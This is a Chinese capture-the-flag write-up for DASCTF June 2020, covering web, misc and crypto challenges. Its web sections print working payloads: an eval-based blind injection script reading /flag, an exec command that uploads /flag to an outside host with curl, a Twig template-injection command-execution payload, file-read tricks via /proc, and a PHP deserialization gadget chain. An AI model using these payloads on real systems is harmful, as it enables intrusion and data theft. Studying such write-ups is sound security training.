[DASCTF 2020.6]Write up

被队友带躺了,大师傅们太强了叭


WEB

简单的计算器1

盲注//直接复制的Y老师脚本

import requests
import re

s = requests.Session()

q = ''

u = 'http://183.129.189.60:10026'

def get_question():
    global q
    r = s.get(u).text
    r = re.compile('<h4>([^<]+)</h4>').findall(r)[0][:-1]
    q = eval(r)

def submit_answer(i, c):
    global q
    r = s.post(u, data={'input': str(q) + f"and '{c}'==open('/flag').read()[{i}]"}).text
    r0 = re.compile('<h3>([^<]+)</h3>').findall(r)[0] == 'Congratulations'
    q = eval(re.compile('<h4>([^<]+)</h4>').findall(r)[0][:-1])
    return r0
get_question()
ans = ''
import string
for i in range(100):
    for j in string.printable:
        if submit_answer(i, j):
            ans+=j
            print(ans)
            break


简单的计算器2

依然盲注,过滤了read 拼接下

///好像可以直接curl带出数据

exec(“o”+”s.s”+”ystem(‘curl -T /flag ip:port’)”)


filecheck

非预期了。

有读取文件

sha256跑出来是chen

测试过程中发现读取文件页面只能是xyz结尾。继续测试发现只要传入变量有xyz即可绕过限制

盲猜了read页面

http://183.129.189.60:10023/read/?token=chen&file=/proc/self/cmdline&file1=xyz

直接读到etc

读一下/proc/self/environ

拿到flag

Subscribe

STMP+TWIG模板注入

<?php
require_once "mail/smtp.class.php";
require_once "mail/smtp.send.php";
require_once "libs/common.func.php";
include 'vendor/twig/twig/lib/Twig/Autoloader.php';

function mailCheck($s) {
    if (preg_match('/\\\|\/|\~|&|\^|\`|\*|\?/i',$s))
    {
        alertMes('damn hacker!', './index.php');
        return false;
    }

    if (!preg_match('/libs|smtp|curl|dev|index\.php|ftp|backdoor|sh/i', $s) )
    {
        if (  preg_match_all('/@/', $s) === 1 )
        {
            $arr = explode('@',$s);
            $domain = end($arr);
            if (!preg_match('/[^a-z0-9._-]/i', $domain))
            {
                return true;
            }
        }
    }

    return false;
}

function alertMes($mes, $url)
{
    echo "<script>
            alert('{$mes}');
            location.href='{$url}';
    </script>";
    die;
}

$smtpEmailTo = $_POST['toemail'];

if (!mailCheck($smtpEmailTo))
{
    alertMes("hacker", "/index.php"); //die;
}

//为了减少邮件服务器压力,任何fuzz都请带上$_POST['test'] 请充分测试后再订阅并发邮件,如果检测到某个用户频繁无脑发邮件会被封禁。
if (isset($_POST['test']))
{
    user_are_fuzzing_and_smtp_server_wont_send_email();
    die;
}

//do not trick
Twig_Autoloader::register();
$loader = new Twig_Loader_String()
$twig = new Twig_Environment($loader);
$yourName = pos(explode( '@', $smtpEmailTo));
$content = @$twig->render($yourName);
$mailcontent = "<h1>Hello <font color=red>".$content."</font><br>Welcome to DASCTF June, Have FUN!</h1>";
$smtp = new Smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
$smtp->debug = false;
$state = $smtp->sendmail($smtpEmailTo, $smtpusermail, $mailtitle, $mailContent, $mailtype);


/* flag is in flag.php */

https://xz.aliyun.com/t/7507#toc-3

直接改改就用了

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("a=cat;b=flag.php;$a $b")}}@ha1c9on.top


phpuns

php session反序列化字符逃逸

见的相当多了。

给了源码:

<?php
class User{
    protected $username;
    protected $password;
    protected $admin;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
        $this->admin = 0;
    }

    public function get_admin(){
        return $this->admin;
    }
}


class Hacker_A{
    public $c2e38;

    public function __construct($c2e38){
        $this->c2e38 = $c2e38;
    }
    public function __destruct() {
        if(stristr($this->c2e38, "admin")===False){
            echo("must be admin");
        }else{
            echo("good luck");
        }
    }
}
class Hacker_B{
    public $c2e38;

    public function __construct($c2e38){
        $this->c2e38 = $c2e38;
    }

    public function get_c2e38(){
        return $this->c2e38;
    }

    public function __toString(){
        $tmp = $this->get_c2e38();
        $tmp();
        return 'test';
    }

}

class Hacker_C{
    public $name = 'admin';

    public function __invoke(){
        var_dump(system('cat /flag'));
    }
}

直接给了cat /flag 所以直接写链子调用就行

$a=new Hacker_A(new Hacker_B(new Hacker_C));

注意的是这里会检测c2e38,但是又得用,所以手动替换十六进制

O:8:"Hacker_A":1:{S:5:"c2\6538";O:8:"Hacker_B":1:{S:5:"c2\6538";O:8:"Hacker_C":1:{s:4:"name";s:5:"admin";}}}

function可以发现替换字符

<?php
function redirect($path)
{
    header('Location: ' . $path);
    exit();
}

function add($data)
{
    $data = str_replace(chr(0).'*'.chr(0), '\0*\0', $data);
    return $data;
}

function reduce($data)
{
    $data = str_replace('\0*\0', chr(0).'*'.chr(0), $data);
    return $data;
}

function check($data)
{
    if(stristr($data, 'c2e38')!==False){
        die('exit');
    }
}

构造不说了,拿着用户名密码登陆就是flag

username:\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
password: “;s:11:”\0*\0password”;O:8:”Hacker_A”:1:{S:5:”c2\6538″;O:8:”Hacker_B”:1:{S:5:”c2\6538″;O:8:”Hacker_C”:1:{s:4:”name”;s:4:”test”;}}s:8:”\0*\0admin”;i:1;}


MISC

cryptographic_call

bmp盲水印,换表base64


physical-hacker

wifi流量分析

aircrack-ng WiFi.cap

先拿到ssid:DASCTF

aircrack-ng 1.cap -w /usr/share/wordlists/rockyou.txt

拿到密码66666666

airdecap-ng 1.cap -e DASCTF -p 66666666

得到解密的流量

导出一个压缩包,有flag.txt

snow隐写

http://fog.misty.com/perry/ccs/snow/snow/snow.html

空秘钥解得

MZWGCZZANFZTUICOMVYHWNRXGBRDCNBXGI4GCZBZHEYDEYLFMNRGCMZSMUZDEZTBGRTDMYTEPUQGG33OM5ZGCZDVNRQXI2LPNZZSCIJB

BASE32得到flag


BaiduYun&Gcode

将数据库导入

得到文件大小和md5

根据:https://blog.jixun.moe/du-code-gen

了解到百度云另一种下载方式,拿到xshadow.png

binwalk 分离到gcode 3D打印

http://gcode.ws/

 

 

拿到flag

Keyboard

内存取证拿到QWE键盘加密

2020- 3-29 22:35:30

2020- 3-29 22:36:41
ctfwikiCRYPTO ABC
CTKQEKNHZHQLLVGKROLATNWGQKRRKQGWNTA

2020- 3-29 22:37:23
[BP][BP]decrypto hou xiao xie geng[BP][BP] yi kan chu

2020- 3-29 22:39:24
But the password is in uppercase

2020- 3-29 22:38:55
a

拿到加密磁盘密码:

VERACRYPTPASSWORDISKEYBOARDDRAOBYEK

挂载一个磁盘镜像,ntfs隐写


透明度

A通道有个压缩包。

解压用Archive password掩码爆破,压缩包密码nepnb

拿到flag


SMB

同样内存取证,dump下TrueCrypt.exe

没找到秘钥。

后盲猜加密磁盘密码是administrator密码:

qweasd!123

成功挂载。拿到文件

<疫情xxxxxxxxxx>

十六进制转字符

base58


CRYPTO

Gemini-Man

rsa大数分解

import sympy  
x = sympy.symbols(“x”)  
a = sympy.solve([x*x+x–7943722218936282],[x])
fl=open('list.txt', 'w')
fl.write(str(a))

得到

pq

rsa已知pqne

盲猜e = 65537

import gmpy2
from Crypto.Util import number
f = open('c:\\users\\admin\\desktop\\list.txt', 'r')
p = int(f.readline())

ff = open('c:\\users\\admin\\desktop\\list1.txt', 'r')
q = int(ff.readline())

fff= open('c:\\users\\admin\\desktop\\C.txt', 'r')
c = int(fff.readline())

e = 65537

 
d = gmpy2.invert(e, (p-1)*(q-1))
# print d
 
m = pow(c, d, p*q)
 
x = number.long_to_bytes(m)
print(number.long_to_bytes(m))
fl=open('list2.txt', 'w')
fl.write(str(x))

得到flag

发表评论

电子邮件地址不会被公开。 必填项已用*标注